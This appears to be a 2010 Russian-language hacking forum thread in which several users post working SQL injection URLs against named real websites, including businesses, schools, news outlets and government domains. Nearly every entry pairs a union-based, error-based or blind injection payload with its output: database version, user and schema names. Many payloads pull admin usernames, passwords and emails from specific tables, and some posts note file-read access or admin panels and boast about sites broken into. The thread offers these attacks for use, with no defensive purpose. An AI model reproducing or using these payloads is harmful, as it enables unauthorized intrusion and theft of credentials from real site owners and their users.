http://newen.pdpegypt.org/cms.php?id=event_details&event_id=-14+union+select+1,2,group_concat(0x0b,email),4,5,6 ,7,8,9,10,11,12,13,14,15,16,17,18+from+ebulletin_u ser--+
ver - 5.1.41
usr - pdpegypt_pdp@localhost
db - pdpegypt_newpdp
os - unknown-linux-gnu
==========================================
http://www.connectcatering.co.uk
ТИЦ: 10
PR: 3
http://www.connectcatering.co.uk/cms.php?id=-8'+union+select+1,concat_ws(0x0b,version(),user(), database(),@@version_compile_os),3,4,group_concat( 0x0b,admin_login,0x3a,admin_password,0x3a,admin_em ail),6+from+admin--+
ver - 5.1.44-community
usr - web136-connectco@localhost
db - web136-connectco
os - pc-linux-gnu
==========================================
http://cashback.2cashback.net
ТИЦ: 0
PR: 3
http://cashback.2cashback.net/cms.php?id=group_shops&group_id=-14+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,g roup_concat(0x0b,username,0x3a,pass,0x3a,email),co ncat_ws(0x0b,version(),user(),database(),@@version _compile_os),17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46+from+admin--+
ver - 5.1.41
usr - cashback_cashbac@localhost
db - cashback_cashback
os - unknown-linux-gnu
==========================================
http://www.malaysiatravelguide.com.my
ТИЦ: 0
PR: 3
http://www.malaysiatravelguide.com.my/cms.php?id=-397+/*!union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),5,6,7*/--+
http://www.malaysiatravelguide.com.my/cms.php?id=-397+/*!union+select+1,2,3,group_concat(0x0b,username,0x 3a,password,0x3a,email),5,6,7+from+xmb_members*/--+
ver - 5.0.90-community
usr - malaysia_malaysi@localhost
db - malaysia_mtg
os - pc-linux-gnu
==========================================
http://www.damentrading.nl
ТИЦ: 0
PR: 2
http://www.damentrading.nl/damen/redir.php?goto=/damen/vesselinfo.php?id=-293+union+select+1,2,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),4,5,group_conc at(0x0b,gebruikersnaam,0x3a,wachtwoord),7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+ from+dms_gebruikers--+
ver - 5.0.77-log
usr - dms@81.18.166.70
db - dms
os - pc-linux-gnu
==========================================
http://kimrealty.allrealestate.com.my
ТИЦ: 10
PR: 2
http://kimrealty.allrealestate.com.my/ag_result.php?agentid=-1+/*!or+(select+count(*)+from+(select+1+union+select+ 2+union+select+3)x+group+by+concat(concat_ws(0x0b, version(),user(),database(),@@version_compile_os), floor(rand(0)*2)))*/--+
ver - 5.0.90-community
usr - allreale_kim@localhost
db - allreale_kimrealty
os - unknown-linux-gnu
==========================================
http://rselectricalsupply.com
ТИЦ: 0
PR: 2
http://rselectricalsupply.com/modules/user/cms.php?id=-3+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3,4--+
ver - 5.0.90
usr - rselectric966004@web163c6.megawebservers.com
db - phpmy1_rselectricalsupply_com
os - pc-linux-gnu
==========================================
http://www.avalonmortgage.com
ТИЦ: 0
PR: 1
http://www.avalonmortgage.com/cms.php?id=-11'+union+select+1,2,3,4,5,6,7,8,concat_ws(0x0b,ve rsion(),user(),database(),@@version_compile_os),10 ,11,12,13--+
ver - 5.1.39-log
usr - avmusr@cort.dreamhost.com
db - avalonmotgagedb
os - pc-linux-gnu
==========================================
http://www.xcontrols.com
ТИЦ: 10
PR: 1
http://www.xcontrols.com/cms.php?id=-53'+union+select+1,concat_ws(0x0b,version(),user() ,database(),@@version_compile_os),group_concat(0x0 b,user,0x3a,password,0x3a,email),4+from+bloly_User--+
http://www.xcontrols.com/cms.php?id=-53'+union+select+1,now(),group_concat(0x0b,sUserNa me,0x3a,sPassword),4+from+xls_users--+
ver - 5.0.77-log
usr - xcl@localhost
db - xcldb
os - portbld-freebsd6.3
==========================================
http://ontariooilng.com
ТИЦ: 0
PR: 0
http://ontariooilng.com/cms.php?ID=-6+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3,group_concat(0x0 b,UserName,0x3a,Password,0x3a,Email)+from+admin--+
ver - 5.0.89-COMMUNITY
usr - ONTARIOO_ONTARIO@LOCALHOST
db - ONTARIOO_ONTARIOOILING
os - PC-LINUX-GNU
http://www.asianpga.com/article.php?sid=-1+union+select+1,2,3,4,concat_ws(0x2a,username,pas sword,email,admin),6+FROM+apga_members+limit+0,1--
asianpga_sql@localhost*5.0.81-community*asianpga_db
http://www.heating.kz/index.php?p=news_more&id=117+AND+1=0+UNION+SELECT+1,2,3,concat_ws(0x3a,l ogin,pass),5,6,7,8,9,10,11,12+FROM+ferroli_admins+--+
CyberHunter
06.06.2010, 18:49
http://www.clanib.co.za/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%28 0x3a,user%28%29,database%28%29,version%28%29%29%20 from%20e107_user*/
Version: 5.0.90
User: nashie0_nashief@localhost
Database: nashie0_nashief
http://ab-league.windos2k.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%28 0x3a,version%28%29,user%28%29,database%28%29%29%20 from%20e107_user*/
Version: 4.1.22
User: windos2k@localhost
Database: windos2k_com_-_comp
http://www.secondocircolosarno.gov.it/2sarno/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28version%28% 29,user%28%29,database%28%29%29,2,3,4+from+jos_use rs--
Version: 5.1.30-log
Database: secondocircsarno
User: secondocircsarno@62.149.215.59
PR: 2
http://www.waldorf-namibia.org/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28version%28% 29,database%28%29,user%28%29%29,2,3,4+from+jos_use rs--
Version: 4.1.22-standard-log
Database: db201164
User: db201164@local
PR: 5
http://www.sanmarinoforum.org/forum08/__download_forum08_rassegna.php?id=-91+union+select+concat(user(),version(),database() ,@@version_compile_os),2
PR-4
CyberHunter
06.06.2010, 23:34
http://www.clkclan.com/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%28 user%28%29,database%28%29,version%28%29%29%20*/
Version: 5.1.30
User: clkclan_clkman@localhost
Database: clkclan_clk
http://www.cricket-online.com/news.php?sid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x2a,user(),version(),database()),14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30--
cricketo_cricket@localhost*5.0.51a-community-log*cricketo_nuke
aka_zver
07.06.2010, 10:52
Blind; select фильтруется.
http://www.zatopek.fr
+
http://www.zatopek.lu
+
http://www.zatopek.be
ТИЦ: 0
PR: 4
http://www.zatopek.fr(.be или .lu)/cms.php?id=30+and+substring(version(),1,1)=5--+
============================================
http://www.busicomsolutions.com.au
ТИЦ: 0
PR: 1
http://www.busicomsolutions.com.au/recruit/timesheets.php?cat_id=-1+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3,4,5--+
http://www.busicomsolutions.com.au/recruit/timesheets.php?cat_id=-1+union+select+1,group_concat(0x0b,admin_user,0x3a ,admin_pass),3,4,5+from+tbl_admin--+
ver - 5.0.90-community
usr - vns_busicom@localhost
db - vns_busicomjob
os - pc-linux-gnu
============================================
http://www.bromleystone.co.uk
ТИЦ: 0
PR: 0
http://www.bromleystone.co.uk/cms.php?ID=1+union+select+1,2,concat_ws(0x0b,versi on(),user(),database(),@@version_compile_os),4,5,g roup_concat(0x0b,column_name),7+from+information_s chema.columns+where+table_name=0x62726F6D6C6579746 1626C65--+
ver - 5.0.87-a2hosting-percona
usr - bromley_bromley@localhost
db - bromley_bromleystone
os - unknown-linux-gnu
============================================
http://www.autobusnigeria.com
ТИЦ: 0
PR: 0
http://www.autobusnigeria.com/cms.php?ID=-4+union+select+1,concat_ws(0x0b,version(),user(),d atabase(),@@version_compile_os),3--+
ver - 4.1.22-standard
usr - autobusn_autobus@localhost
db - autobusn_autobus
os - pc-linux-gnu
============================================
http://www.kumardirect.com
ТИЦ: 0
PR: 0
http://www.kumardirect.com/cms.php?id=-2+union+select+1,2,3,concat_ws(0x0b,version(),user (),database(),@@version_compile_os),group_concat(0 x0b,login_id,0x3a,password,0x3a,email),6,7,8,9+fro m+sysadmin--+
ver - 5.0.77-log
usr - kumardirect@217.194.210.50
db - kumardirect
os - redhat-linux-gnu
<Cyber-punk>
07.06.2010, 17:42
Target: http://www.ac-psych.org/
User: acp_ac-psych@81.2.203.24
(http://www.ac-psych.org/?id=11111%20union%20select%20system_user%28%29)
Database: acpsych_ac-psych
(http://www.ac-psych.org/?id=111%20union%20select%20database%28%29)
Version: 5.0.33-log
(http://www.ac-psych.org/?id=111%20union%20select%20version%28%29)
Или всё вместе:
http://www.ac-psych.org/?id=-1%20union%20select%20concat_ws(0x0b,version(),user %20%20(),database(),@@version_compile_os)
PR-6
http://www.educacionbc.edu.mx/publicaciones/SintesisEv/Sintesis.php?Num=242+union+select+1,2,3,4,5,6+from +"table"
PR-5
ms_access
<Cyber-punk>
07.06.2010, 20:08
Target: http://dir.kedah.gov.my/
User: root@localhost
Database: berita
Version: 5.0.77
OS: redhat-linux-gnu
PR-5
http://dir.kedah.gov.my/info.php?id=-1+union+select+0,1,2,3,4,concat_ws(0x0b,version(), user(),database(),@@version_compile_os)
http://www.10ballov.ru/view_kont.php?sid=91&pid=-1+union+select+1,2,3,4,concat_ws(0x2a,user,pass,si te),6,7,8,9,10,11,12,13,14,15+FROM+admin_users+lim it+0,1--
http://www.mp3style.ru/player.php?group_id=23&id=-451+'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,concat_ws( 0x3a,version(),user(),database()),12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46+--+
5 ветка
http://jipam.vu.edu.au/article.php?sid=-434+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14
user() : jipam@localhost
version() : 4.0.18-Max
database() : jipam
PR-6
http://www.skypemate.ru/articles/?id=-149+UNION+SELECT+concat_ws(0x3a,version(),user(),d atabase()),2+--+
version: 5.0.67-log
user: u15838@10.10.10.229
database: u15838
wildshaman
08.06.2010, 19:49
http://www.landoor.ru/index.php?b=12&act=1&idf=-34+union+select+1,2,3,concat_ws(0x3a,user(),versio n(),database()),5,6--
landoor_new@hosting8.telekom.ru:5.0.45:landoor_db
Тиц 130 Пр 3 вывод в тайтле
http://www.sexykats.ru/action.php?action=news&id=-12+union+select+1,group_concat(0x0b,TABLE_NAME),3, 4+from+information_schema.tables--
BlackFan
08.06.2010, 20:50
тиц 40, pr 0
http://showbilet.ru/index.php?nav=1&page=3&id=2+union+select+1,concat_ws(0x3a,user(),database (),version()),3,4
http://showbilet.ru/order_new.php?id=-1+union+select+concat_ws(0x3a,user(),database(),ve rsion()),2,3,4,5,6,7,8,9,10/*
http://showbilet.ru/index.php?page=2&category=-1+union+select+1,concat_ws(0x3a,user(),database(), version()),3,4
showbile@v27.valuehost.ru:showbile:4.0.27-log
тиц 1100, pr 4
http://www.electro-mpo.ru/Select?&crazd=982+and+substr((select+table_name+from+sys.u ser_tables+where+rownum%3C=1),1,1)='L'+--+
http://www.electro-mpo.ru/Select?cgroupe=150+and+1=1
Oracle
user: TRADER
http://www.kkpartizan.rs/sr/vest.php?id=471+union+select+1,concat_ws(0x 3a,version(),databa se(),user()),3,4,5--
PR - 4
Database Version : 5.0.90-community
Database name : kkparti_stat
User : kkparti_stat@localhost
OS : pc-linux-gnu
-------------------------------------------------
http://www.24sata.rs/vesti.php?id=-73036+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3 a,version(),databas e(),use r()),11,12,13,14,15,16,17,18,19,20,21--
PR - 6
Database Version : 5.1.46-community-log
Database name : 24sata
User : 24sata@10.127.0.4
OS : unknown-linux-gnu
http://www.24sata.rs/vesti.php?id=-73036+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3 a,password,admin,email),11,12,13, 14,15,16,17,18, 19,20,21+from+kori snici--
http://www.governors.ru/?regmode=regions®ion=0&razdel=smi&statja=99782+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a ,version(),user(),database(),@@version_compile_os) ,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,2 4,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40, 41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57 ,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,7 4,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 91,92,93,94,95,96,97,98,99,100,101,102,103,104,105 ,106,107,108,109,110,111,112,113,114,115,116+limit +1,1
Database Version: 5.0.89-Max-log
Database name: governor_main
User name: governor_main@c1-w.ht-systems.ru
Os:Linux
да простят меня фанаты Aerosmith
http://www.aerosmithsetlists.tv/tour.php?s=197604160&e=197702090&t=4&tour=5&id=-12+union+select+group_concat(0x0b,username,0x3a3a, password)+from+users--
http://greatmexicantours.com/tour.php?id=-12+union+select+1,2,3,4,5,6,7,8,group_concat(0x0b, table_name),10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,3 9,40,41,42,43+from+information_schema.tables--
CyberHunter
09.06.2010, 00:09
http://www.dragonmaster.ws/e107_plugins/advmedsys/advmedsys_view.php?det.1/*!%20and%200%20union%20select%201,2,3,concat_ws%28 version%28%29,user%28%29,database%28%29%29%20*/
Version: 5.1.46-log
User: dragonm2_ozs2@localhost
Database: dragonm2_ozs2
Это уже хз какой по счету клан я сломал :D
http://jlistltd.com/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28version%28% 29,database%28%29,user%28%29%29,2,3,4+--+
Version: 5.0.91-log
User: jlistjoom@72.167.131.8
Database: jlistjoom
Федерация Танцевального Спорта России
http://www.ftsr.ru/news.php?news_id=-120+union+all+select+1,2,3,4,concat_ws(0x3a,@@vers ion,user(),database(),@@version_compile_os),6,7+--
version : 4.0.27-log
user : ftsr139_2007@v26.valuehost.ru
database : ftsr139_2007
os : portbld-freebsd7.1
http://www.mossberg.com/products/default.asp?id=5+or+1=@@version
PR-5
--------
http://www.pembroke.sa.edu.au/page.php?section=-517+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, concat_ws(0x3a,user(),version(),database())
PR-5
http://shina.allforauto.ru/shina-detail.php?item=-85962+'+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,concat_ws(0x3a,version(),database(),user()) ,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,3 3,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49, 50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66 ,67,68,69+--+
Version: 4
http://start-chel.ru/catalog/?CatID=-66+and+1=2+union+select+1,concat_ws(char(58),versi on(),user(),database(),@@version_compile_os),3,4,5 ,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 ,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,4 0,41,42,43,44,45--
version : 4.1.22-lk-log
user : startchelr@localhost
database : startchelr
os : pc-linux-gnu
http://www.fanfics.ru/index.php?section=3&id=-1068+union+select+group_concat(0x0b,table_name),2, 3+from+information_schema.tables--
http://www.insb.edu.rs/news.php?id=-60+union+select+1,concat_ws(0x3a,version(),da tabase(),user()),3,4,5--
Database Version : 5.0.22
Database name : insb_3909
User : insb_3909@4-0-n.01.ac.ehp.eunethosting.com
OS : redhat-linux-gnu
------------------------------
Баскетбольный клуб "Партизан"
http://www.kkpa rtizan.rs/en/onenews.php?id=574+union+se lect+1,concat_ws(0x3a,version(),database(),user()) ,3,4,5--
PR - 4
Database Version : 5.0.90-community
Database name : kkparti_stat
User : kkparti_stat@localhost
OS : pc-linux-gnu
------------------------------
http://www.panoeconomicus.rs/issue.php?id=-32+union+select+1,2,concat_ws(0x3a ,version(),da tabase(),user()),4--
PR - 5
Database Version : 5.0.22
Database name : pano_5315
User : pano_5315@2-0-n.01.ac.ehp.eunethosting.com
OS : redhat-linux-gnu
http://57gran.ru/catview57.php?cat57_id=-2+and+1=2+union+select+concat_ws(char(58),@@versio n,user(),database(),@@version_compile_os)+--
version : 5.0.32-Debian_7etch12-log
user : kostroma_57@77.221.130.2
database : kostroma_57
os : pc-linux-gnu
http://testing.edu-chem.co.uk/product.php?product_id=-23+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13
user() : teduc_user@localhost
version() : 5.0.90-community
database() : teduc_db
OS : Linux
http://www.sokol-mebel.ru/news/?n_id=-35+union+select+1,2,3,concat_ws(char(58),@@version ,user(),database(),@@version_compile_os)+--
version : 5.0.90-log
user : u97809@10.8.0.135
database : u97809
os : portbld-freebsd7.2
http://www.hair-epilation.ru/index.php?id=-115+UNION+SELECT+1,concat_ws(0x3a,version(),user() ,database()),3,4+--+
Version: 4
http://www.044.com.ua/howto/?id=-8+%27+UNION+SELECT+concat_ws(0x3a,version(),user() ,database())+--+
Version: 5
http://www.izmirgida.com/firma.php?id=-4+union+select+column_name+from+information_schema .columns+where+table_name=0x616363657373+--
MySQL 5.0.51a
table: access
columns: id, username, password
panel: http://www.izmirgida.com/admin
query
http://www.izmirgida.com/firma.php?id=-4+union+select+concat_ws(0x3a,id,0x3a,username,0x3 a,password)+from+access+--
result
admin::[censored]
PR 5
http://www.fiba-group.com/en/sirketler.php?gid=1&sid=-1+union+select+1,2,3,4,5,concat_ws(0x2a,user(),ver sion(),database()),7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34, 35--
root@localhost*4.1.22-community-nt*fibaen
===============
http://www.latincounsel.com/eng/noticiaampliada.php?nid=-1+union+select+1,2,3,4,5,6,7,concat_ws(0x2a,user() ,version(),database()),9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27--
latincounsel@92.61.146.171*5.0.85-log*latincounsel
===============
http://www.colofb.com/html/news/pressrelease_detail.php?nid=-1+union+select+1,2,3,4,5,concat_ws(0x2a,user(),ver sion(),database()),7,8,9--
colofbco_usr@localhost*5.0.45-community-nt*colofbco_db
==============
PR 6
Все базы доступны на чтение.
http://tv.cancaonova.com/conteudo_programas.php?pid=-75+union+select+1,group_concat(SCHEMA_NAME),3,4,5, 6,7,8+FROM+INFORMATION_SCHEMA.SCHEMATA--
wildshaman
11.06.2010, 13:38
ТИЦ 600 ПР 2
http://www.kuzzbas.ru/more.php?UID=1+or(1,1)=(select+count(0),concat((se lect+concat_ws(0x3a,user(),version(),database())+f rom+information_schema.tables+limit+1,1),floor(ran d(0)*2))from(information_schema.tables)group+by+2)--+
u192886@10.10.12.62:5.0.45:u192886_kuzzbas1
ТИЦ 275 ПР 3
http://www.vmurmanske.ru/catalogue.php?rubric=1+or(1,1)=(select+count(0),co ncat((select+concat_ws(0x3a,user(),version(),datab ase())+from+information_schema.tables+limit+1,1),f loor(rand(0)*2))from(information_schema.tables)gro up+by+2)--+
vmurmanske@242-42.szkti.ru:5.1.46-log:vmurmanske1
http://www.zionmag.org/news.php?year=-2007+union+select+1,2,3,4,5,6,7,8+from+user--
user() : raver@localhost
version() : 4.0.24
database() : zionmag
OS : pc-solaris2.10
PR-4
--------
http://www.nispa.org/_portal/conference.php?sid=588&cid=-18+union+select+1,4,3,4,5,6,7,8--
user() : nispa_sk@10.10.1.67
version() : 4.1.22-log
database() : nispa_sk
OS : pc-linux-gnu
PR-6
PostgreSQL
http://www.usj.edu.lb/actualites/news.php?id=1;select+cast(table_name+as+int)+from+ information_schema.tables+where+table_name+not+in+ ($$views$$)--
PR 4
http://www.eaglecountryonline.com/news.php?nID=-1+union+select+1,concat_ws(0x2a,user(),version(),d atabase()),3--
eaglecou_eagledb@localhost*5.0.90-community*eaglecou_eagle
pr 3
тиц 325
http://www.presa.ua/index.php?mod=mod4&news=1&id=-1+UNION+SELECT+1,2,3,4,5,6,7,8,9--
MySQL Info: presaukr_presssa@saturn:4.1.22-log:presaukr:binjportbld-freebsd5.5
http://www.energia-comision1.gov.ar/vernoticia.php?id=-1%20UNION%20SELECT%201,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),3,4,5,6,7,8,9
User: uv0649@localhost
Database: uv0649_database
Version: 4.1.14-log
http://www.vcoderz.com/index.php?p=youtube_list&t=-1+union+select+concat_ws(0x3a,user(),version(),dat abase(),@@version_compile_os)&s=111
а жаль :)
jecka3000
11.06.2010, 21:22
http://www.lannaworld.com/cgi/lannaboard/reply_topic.php?id=-785+union+select+1,concat(version(),0x20,database( ),0x20,user()),3,4,5,6,7,8,9--
5.1.39-log
lannaworld
lannaworld@nassau.dreamhost.com
http://classes.dma.ucla.edu/Winter06/161B/projects/ed/DRAview.php?article=-2+union+select+1,concat(version(),0x20,database(), 0x20,user()),3,4,5,6,7,8,9,10,11,12,13--
5.0.77
edchao
edchao@ha.design.ucla.edu
http://www.economiaparatodos.com.ar/ver_nota.php?nota=-1+UNION+SELECT+1,concat_Ws%280x3a,user%28%29,datab ase%28%29,version%28%29%29,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20+--+
User: uv7450_ept@localhost
Database: ept_v3
Version: 5.0.45-Max-log
PR 6, http://www.goldenpaints.com
http://www.goldenpaints.com/artist/wap/artist.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_w s(0x2a,email_address,username,password,user_level) ,14,15,16,17,18,19,20,21+FROM+wap.users--
------------------
root@localhost*4.1.22*gardexru
http://www.gardex.ru/catalog/series.php?uid=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,conca t_ws(0x2a,user(),version(),database()),15,16,17,18 ,19,20,21,22,23--
jecka3000
12.06.2010, 13:05
http://www.academiaga.ru/index.php?id=-53+union+select+concat(version(),0x20,database(),0 x20,user()),2,3,4--
4.0.27-log
aga_www
aga_www@195.242.3.251
http://www.ophthalmo.ru/rus/index.php?id=-565+union+select+1,2,concat(login,0x20,password),4 +from+sm_users+limit+1,1--
http://peoplephoto.ru/foto/index.php?id=-1156+union+select+concat(version(),0x20,database() ,0x20,user())--
4.0.27-log
peoplep0_catalogphoto
peoplep0_qweeert@localhost
PR5
http://www.itmaasia.com/news.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,group_concat(0 x0b,username,0x3a3a,password),12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27+from+tb_admin--
PR 3
4.0.27-log
mona-liza
mona-liza@zvm17.host.ru
http://www.mona-liza.com/act.php?id=-4+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--
BlackFan
12.06.2010, 18:35
http://interier-portal.ru/catalog.php?enter=firms&id=-1+union+select+group_concat(0x3C62723E,concat_ws(0 x3a,username,user_password))+from+phpbb_users
root@localhost:interier:4.1.25
http://blindcanadians.ca/press_releases//index.php?BriefID=-50+union+Select+1,2,table_name,4+from+information_ schema.tABLES--
CyberHunter
12.06.2010, 20:32
http://www.saltwatercharterswa.com.au/index.php?option=com_gcalendar&view=event&eventID=peler&start=memek&end=kentu&gcid=2+AND+1=2+UNION+SELECT+0,concat%28user%28%29, database%28%29,version%28%29%29,2,3,4+--+
Version: 5.0.51a-24
User: myswcw1000@ws-shared
Database: netswcwa_saltwatercharterswa_com_au
http://www.eurotur.com.ar/php/newdesign/nacional/region.php?tipoweb=1&directorio=/php/newdesign/nacional/&tipoturismo=2®ion_id=&pais_codigo=-1+UNION+SELECT+1,version(),3,4,5--+
base: eurotur
file_priv: Y
basedir: /usr/
user: apache@localhost
os: suse-linux
tmpdir: /var/lib/mysql/.tmp/
ver: 5.0.26
datadir: /var/lib/mysql/
http://www.neorganika.ru/out.php?gid=-22+union+select+1,2,concat_ws(0x3a,user(),version( ),database(),@@version_compile_os,@@tmpdir,@@datad ir),4--&razdel=0
user: viziter@localhost
database: dbng
version: 5.0.45
version_compile_os: redhat-linux-gnu
PR2
Вывод в тайтле.
tables:
brend
dop
firms
jobs
konsalt
news
pdf
picture
prob
quest
ripit
sales
sizes
stat
subscribe
svoistva
tabl
tabletype
texts
title
types
userquest
userquest columns:
idu
fio
email
password
http://www.neorganika.ru/out.php?gid=-22+union+select+1,2,concat_ws(0x3a,email,password) ,4+from+userquest--&razdel=0
http://www.newsarama.com/php/multimedia/album.php?gid=-780+union+select+1,2,concat_ws(0x3a,user(),databas e(),version(),@@version_compile_os,@@tmpdir,@@data dir,@@basedir),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36--
user: cms_user@10.7.0.241
database: publish_new2
version: 5.0.45-log
version_compile_os: redhat-linux-gnu
PR7
version(),user(),database() = 5.0.60,avk@localhost,avk
http://www.senpolia.org.ua/view.php?uid=-1+union+select+1,2,3,version(),5,user(),7,8,databa se()--
Читает файлы.
===============
einrichtungsbeispiele.de
http://www.einrichtungsbeispiele.de/index.php?uid=13343&show=blog&blogid=-1+union+select+1,2,concat_ws(0x2a,us_vorname,us_na me,us_email,us_passwort),4,5,6,7,8,9,10,11,12,13,1 4+FROM+user--
http://www.adrvest.ro/index.php?page=articol&aid=-455+union+select+1,2,3,4,5,group_concat(username,c har(58),password),7,8,9,10,11,12,13+from+adr_admin s--
+ phpinfo
http://www.adrvest.ro/test/info.php
PR-5
http://www.lerocambole.com/index.php?num=6+UNION+SELECT+1,concat_ws(0x3a,vers ion(),user(),database()),3+--+
Version:5
http://www.portalsolidario.net/tablon/index.php?num=-7+%27+UNION+SELECT+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6,7,8,9,10+--+
Version: 4
http://www.cubaescena.cult.cu/entretelones/index.php?num=-24&sec=17+UNION+SELECT+1,2,3,4,5,concat_ws(version(), user(),database()),7,8,9,10,11,12,13+--+
Version: 4
CyberHunter
13.06.2010, 16:44
Сегодня похекал Китай :D
http://www.hsb-weibel.ch/index.php?type=web&lang=de&show=-77+union+select+1+--+&mhs=66
version: 5.0.77-log
user: user25569@web41
database: db2556901
http://www.mlt-licht.ch/index.php?type=web&lang=de&show=-27+union+select+1+--+&mhs=22
version: 5.0.77-log
user: user21651@web33
database: db2165101
http://www.buchsmarketing.ch/index.php?type=web&lang=de&show=-89+union+select+1+--+&mhs=88
user: user20756@web32
version: 5.0.77-log
database: db2075601
http://doska.minsk-in.net/showit.php?podrobnoid=35591%27+union%20select%201, 2,3,version%28%29,user%20%28%29,database%28%29,1,1 ,9,10,11,12,13,14,15;%20+--+
user: minskin9_admin@localhost
version: 5.0.77
http://www.olologames.com/game.php?id=-1+UNION+SELECT+1,2,3,4,group_concat%28login,0x3A,p asswd,0x0b%29,6+FROM+admin_ololo.users
database: admin_ololo
user: admin_gudron@localhost
version: 5.1.34
http://www.mdatoday.com/artists_detail.php?id=-940+or(1,1)=(select+count(0),concat((select+concat (user(),version(),database(),@@version_compile_os) +from+information_schema.tables+limit+0,1),floor(r and(0)*2))from(information_schema.tables)group+by+ 2)--+
http://antikwar.by/news.php?mode=show&id=-1+union+select+1,2,3,concat(f_id,0x3a,f_login),5,6 +from+t_admins+limit+2,1--
.:[melkiy]:.
13.06.2010, 20:30
тИЦ 850 пр 5
http://www.media-online.ru/index.php3?&id=9&mId=4&idd=-24240+union+select+1,concat_ws(0x3a,version(),user (),database()),3,4,5,6+from+mysql.user+--+
LanSilot
13.06.2010, 20:47
http://www.59dom.ru/articles_in.php?id=-39+%27+union+select+1,concat(user(),version(),data base(),@@version_compile_os),3,4,5,6,7,8,9,10,11,1 2,13+--+
Blind-SQL
http://humor.qip.ru/
Все просто:
Target: http://humor.qip.ru/eval/-1/post/3279
Cookie: humor=bf1dcbb35f76c32dad768bf5e5d0138d'+or+(select * from (select count(*) from (select 1 union select 2 union select 3)r group by concat((select concat_ws(0x3a,table_name,table_schema) from information_schema.tables limit 1),floor(rand(0)*2)))u) -- 1
Таблицы:
COLLATIONS:information_schema1
COLLATION_CHARACTER_SET_APPLICABILITY:information_ schema1
COLUMNS:information_schema1
COLUMN_PRIVILEGES:information_schema1
KEY_COLUMN_USAGE:information_schema1
PROFILING:information_schema1
ROUTINES:information_schema1
SCHEMATA:information_schema1
SCHEMA_PRIVILEGES:information_schema1
STATISTICS:information_schema1
TABLES:information_schema1
TABLE_CONSTRAINTS:information_schema1
TABLE_PRIVILEGES:information_schema1
TRIGGERS:information_schema1
USER_PRIVILEGES:information_schema1
VIEWS:information_schema1
comment:humorqippost1
editors:humorqippost1
eval:humorqippost1
parametrs:humorqippost1
post:humorqippost1
right_block_index:humorqippost1
right_block_tags:humorqippost1
right_block_topic:humorqippost1
smile:humorqippost1
tags:humorqippost1
tags_post:humorqippost1
users:humorqippost1
Дальше сами.
LanSilot
13.06.2010, 21:05
http://all-poker.biz/statya.php?id=-27+%27+union+select+1,concat(user(),0x3a,version() ,0x3a,database(),0x3a,@@version_compile_os),3+--+
database: dmffmdxv_vaza
user: dmffmdxv_vaza@c1-w.ht-systems.ru
version: 5.0.89-Max-log
http://www.obmenay.com/news_detail.php?id=-24+union+select+table_name,2+from+information_sche ma.tables--
http://www.garantpost.ru/about/newsid?id=-196+union+select+1,concat(version(),0x3a,user(),0x 3a,database()),3--
version: 4.0.27-log
user: garant@zvm16.host.ru
database: garant
http://plusiminus.com/item.php?id=449+and+1=0+union+select+1,2,concat(ve rsion(),0x3a,user(),0x3a,database()),4,5,6,7,8,9,1 0,11,12,13--
version: 5.1.41-log
user: m35978@fhe11.hoster.ru
database: db35978m
